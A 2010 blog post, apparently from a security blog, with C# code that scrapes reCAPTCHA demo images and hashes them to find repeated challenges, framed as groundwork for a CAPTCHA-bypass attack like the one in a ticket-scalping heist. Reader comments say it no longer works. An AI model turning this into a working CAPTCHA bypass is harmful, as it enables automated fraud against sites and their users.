XSS - Cross-Site Scripting: Scraping

After reading about the $25 million online ticket heist and the involvement of the reCAPTCHA service I decided to see if the reported flaw was still present. From the article:

[The perpetrators] wrote a script that impersonated users trying to access Facebook, and downloaded hundreds of thousands of possible CAPTCHA challenges from reCAPTCHA. They identified the file ID of each CAPTCHA challenge and created a database of CAPTCHA “answers” to correspond to each ID. The bot would then identify the file ID of a challenge at Ticketmaster and feed back the corresponding answer.

If the writer was referring to the ID passed to http://api.recaptcha.net/image via query string, the vulnerability appears to be fixed as the ID is temporary. However, the images are still the same and through the use of a cryptographic hash function such as MD5 we can identify duplicates. The following C# console application downloads a number (specified by the imageCount variable) of CAPTCHA images from reCAPTCHA, hashes each, groups the results by hash, then writes the results to a text file. Downloading as few as 1024 images can yield several identical images. Building on this one could potentially pull off the reCAPTCHA attack described in the article.


using System;
using System.Text;
using System.Text.RegularExpressions;
using System.IO;
using System.Net;
using System.Collections.Generic;
using System.Security.Cryptography;

namespace reCAPTCHAScrape
{
    class Program
    {
        static string Request(string Url)
        {
            HttpWebRequest request = WebRequest.Create(Url) as HttpWebRequest;

            string s;

            using (StreamReader reader =
                new StreamReader(request.GetResponse().GetResponseStream()))
                s = reader.ReadToEnd();

            return s;
        }

        static void GetCaptchaImage(int FileNum)
        {
            Regex scriptURLRegex =
                new Regex(@"<script\s*type\s*=\s*""text/javascript""\s*" +
                    @"src\s*=\s*""([^""]+)""\s*><\s*/script>");

            Regex scriptRegex = new Regex(@"challenge\s*:\s*'([^']+)'");

            string pageURL = "http://recaptcha.net/fastcgi/demo/recaptcha";

            string resp = Request(pageURL);

            string scriptURL = scriptURLRegex.Match(resp).Groups[1].Value;

            resp = Request(scriptURL);

            string ID = scriptRegex.Match(resp).Groups[1].Value;

            string imageURL = "http://api.recaptcha.net/image?c=" + ID;

            HttpWebRequest request =
                WebRequest.Create(imageURL) as HttpWebRequest;

            byte[] buffer = new byte[1048576];

            using (Stream s = request.GetResponse().GetResponseStream())
            {
                int len = s.Read(buffer, 0, 1048576);

                Array.Resize(ref buffer, len);
            }

            using (FileStream stream = File.Create(FileNum + ".jpg"))
                stream.Write(buffer, 0, buffer.Length);
        }

        static void DigestImages(string Path)
        {
            DirectoryInfo info = new DirectoryInfo(Path);

            FileInfo[] files = info.GetFiles("*.jpg");

            MD5CryptoServiceProvider md5 = new MD5CryptoServiceProvider();

            Dictionary<string, List<FileInfo>> digestDictionary =
                new Dictionary<string, List<FileInfo>>();

            foreach (FileInfo f in files)
            {
                byte[] buffer = File.ReadAllBytes(f.FullName);

                byte[] digest = md5.ComputeHash(buffer);

                StringBuilder hexStringBuilder = new StringBuilder();

                foreach (byte b in digest)
                    hexStringBuilder.Append(Convert.ToString(b,
                        16).PadLeft(2, '0'));

                string hexString = hexStringBuilder.ToString();

                if (digestDictionary.ContainsKey(hexString))                
                    digestDictionary[hexString].Add(f);
                else
                    digestDictionary.Add(hexString, new List<FileInfo>() { f });
            }

            StringBuilder results = new StringBuilder();

            foreach (string s in digestDictionary.Keys)
            {
                results.AppendLine(s);

                foreach (FileInfo f in digestDictionary[s])
                    results.AppendLine(f.FullName);

                results.AppendLine();
            }

            string filename = @".\Results_" + Environment.TickCount + ".txt";

            File.WriteAllText(filename, results.ToString());                        
        }

        static void Main(string[] args)
        {
            const int imageCount = 1024;

            Console.Write("Downloading images");

            for (int i = 0; i < imageCount; i++)
            {
                try
                {
                    GetCaptchaImage(i);

                    Console.Write(".");
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine(ex.ToString());
                }
            }

            Console.WriteLine("\r\nSearching for matches...");

            DigestImages(@".\");

            Console.WriteLine("Complete. Press any key to continue...");
            Console.ReadKey();
        }
    }
}

A match in the output looks like this:


cf75401ef23c167260aa6d93bb7fbc42
C:\Source\reCAPTCHAScrape\reCAPTCHAScrape\bin\Debug\533.jpg
C:\Source\reCAPTCHAScrape\reCAPTCHAScrape\bin\Debug\869.jpg

5 comments:

AnonymousMay 12, 2010 at 2:56 PM
I'm currently testing this (in php though), but it doesnt work.
After 2000 files, no matching :(
John LeitchMay 12, 2010 at 4:13 PM
I just ran it again and didn't get any either. It looks like the fun might be over for now, although I have another method in mind.
AnonymousJuly 7, 2010 at 11:59 AM
Hello John I read your comment about having a new new method in mind. I am interested in it . Would you mind posting an article or comment about it?
John LeitchJuly 11, 2010 at 11:58 AM
When I get some free time I'll post an article about it.
AlzieSeptember 13, 2010 at 12:58 AM
John you get that free time? Interested as well in any new techniques you have in mind

XSS - Cross-Site Scripting

Tuesday, March 2, 2010

Scraping - reCAPTCHA Hack

5 comments:

About Me

Blog Archive

Blog Catalog

Blogflux

Blogged

Blogville